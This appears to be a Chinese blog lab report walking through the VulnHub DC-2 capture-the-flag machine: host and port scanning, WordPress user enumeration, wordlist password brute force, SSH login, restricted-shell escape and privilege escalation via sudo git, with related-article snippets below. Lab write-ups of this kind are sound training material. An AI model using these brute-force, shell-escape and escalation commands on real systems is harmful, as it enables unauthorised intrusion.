DC-2靶场实验报告

最新推荐文章于 2024-09-30 09:51:27 发布
最新推荐文章于 2024-09-30 09:51:27 发布
阅读量902 收藏 6
点赞数 20
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiaxingjia123/article/details/142605824
版权

 DC-2靶场实验测试

步骤一:环境搭建:

与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始。

和DC-1一样,有五个flag

下载靶场环境

靶场下载地址:

DC: 2 ~ VulnHub

步骤二:搭建靶场,靶场IP为:xxx.xxx.xxx.xxx/24

开始寻找真实靶场IP:nmap -sP 192.168.132.132

步骤三:探端口及服务:nmap -A -p- -v 192.168.132.132

步骤四:访问web站点

http:// 192.168.132.132

访问后会发现访问不了,这时我盟需要输入

vim /etc/hosts

添加完成之后,再次访问,访问成功

可以很明显的发现这是一个wordpress的站点,发现flag1

步骤五:做一个目录扫描

dirb http://dc-2/

发现疑似后台地址

打开后进入到登录页面

步骤六:用户名枚举

   Wpscan一些常用语句:

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

    扫描wordpress版本

wpscan --url http://dc-2

发现wordpress的版本4.7.10

登录页面尝试登录
随即输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举

首先来个用户枚举,再尝试利用枚举到的用户爆破密码

wpscan --url http://dc-2 --enumerate u

 枚举出三个用户名:admin jerry tom

步骤七:暴力破解出账号密码

cewl http://dc-2/ -w dict.txt   或者 cewl http://dc-2/ > 1.txt

使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dict.txt

爆破出来两个账号 

jerry/adipiscing

tom/parturient 00

步骤八:jerry/adipiscing登录此站点

tom/parturient登陆此站点

发现flag2:登录后台之后,我们看到flag2,我用的是jerry的账号

点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh

在tom的家目录发现flag3

jerry/adipiscing

tom/parturient

步骤九:登录ssh

ssh tom@192.168.66.141 -p 7744

在tom账号的家目录 发现flag3

cat用不了

我这里把查看命令都尝试了一遍 less和vi可以来查看,

提示内容如下

接下来,尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642

查看可以使用的命令

echo $PATH

cd进不去目录 使用ls直接查看目录信息

使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

步骤十:在jerry的家目录发现flag4

看到提示信息如下:

Good to see that you've made it this far - but you " re not home yet .

很高兴看到你走了这么远,但你还没回家。

You still need to get the final flag (the only flag that really counts!!! ).

您仍然需要获得最后的标志(唯一真正重要的标志!)

No hints here 一you're on your own now. :- )

这里没有暗示,一,你现在只能靠自己了。*-)

Go on

继续

git outta here!!!!

大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

    使用tom用户无权限运行sudo 我们切换到jerry用户

    我们可以看到无需root权限,jerry 可以使用 git

步骤十一:提权

查看一下可以使用的root权限命令

find / -user root -perm -4000 -print 2>/dev/null

jerry用户也不可以直接sudo su

使用git命令进行提取

sudo git help status

输入!/bin/sh,直接输入就行

提权成功

步骤十二:发现final-flag.txt

cd /root

cat final-flag.txt

jiaxingjia123
关注
DC-1靶场渗透实验
Alashan12的博客
05-05 1971
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
DC-2靶场渗透测试实验整理
u013930899的博客
09-15 1931
dc-2实验
DC-1靶场实验报告
jiaxingjia123的博客
09-25 752
DC-1靶场实验报告
DC-2靶场详细教程
2301_77518341的博客
09-27 1318
DC-2靶场实验报告一、环境搭建:1. 靶场描述靶场描述与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没
DC-1靶场渗透测试实验整理
u013930899的博客
09-10 2218
DC-1实验
vuInhub靶场实战系列-DC-5实战
weixin_45221204的博客
05-26 1304
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍dc-5靶机渗透测试,内容包括 nmap扫描、dirsearch目录扫描、文件包含、Burp Suite密码爆破、netcat反弹shell、rpcbind漏洞利用、GNU Screen漏洞利用、sudo提权等内容。
Dc-2实验报告
2401_84693679的博客
09-26 753
环境搭建:与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。对于初学者来说,谷歌是你的朋友。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始。点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh。登录后台之后,我们看到flag2,我用的是jerry的账号。
DC-2详细通关实验报告
2301_78713407的博客
09-27 1236
DC-2和DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是要获得渗透测试领域的经验。点击去之后,我们可以看到flag2的提示信息,简单来说就是如果wordpress不可以的话就需要其他方法,我们之前发现有ssh,我们可以看看ssh.发现访问不了,而且发现我们输入的IP地址自动转化为了域名,dc-2这个域名解析失败了,我们需要更改hosts文件,添加一个IP的域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc -2/ > 1.txt。
DC-1靶场
2301_77518341的博客
09-24 710
DC-1靶场实验报告DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。您甚至不需要成为根用户来执行此操作,但是
DC系列漏洞靶场-渗透测试学习复现(DC-8)
W983079520的博客
12-10 1931
DC-8是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了shell反弹和exim提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-8靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。
DC系列漏洞靶场-渗透测试学习复现(DC-5)
W983079520的博客
12-07 1210
DC-5是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了screen漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.147为DC-5靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有三个:80(http默认端口)和111端口、43853端口。 4
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2805
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1425
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
linux 网络序
最新发布
CodeHouse的博客
09-30 269
在将ip字符串转网络序存储时。根据整形二进制显示判断。
在 Kali Linux 中安装 Impacket
weixin_44023460的博客
09-30 109
在安装 Impacket 之前,你需要确保安装了 Python 和一些必要的依赖。通常,Kali 已经预装了 Python。步骤 3:克隆 Impacket 仓库。步骤 4:进入 Impacket 目录。如果你看到帮助信息,说明安装成功。步骤 5:安装 Impacket。
Linux实践】实验四:Shell实用功能及文件权限
Fulling的博客
09-25 774
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
Linux 安装redis主从模式+哨兵模式3台节点
一千个读者就有一千个哈姆雷特
09-27 393
Linux 安装redis主从模式+哨兵模式3台节点
linux 源代码编译
Lxn2zh的博客
09-27 1331
有时候会在linux上下载源码包,然后进行编译成可执行的文件,这个过程需要经过configure、make、make install、make clean四个步骤。configure 为这个程序在当前的操作系统环境下选择合适的编译器和环境参数来编译该代码。make install 将已编译好的可执行文件安装到操作系统指定或默认的安装目录下。make 对程序代码进行编译操作,会将源码编译成可执行的目标文件。make clean 删除编译时临时产生的目录或文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值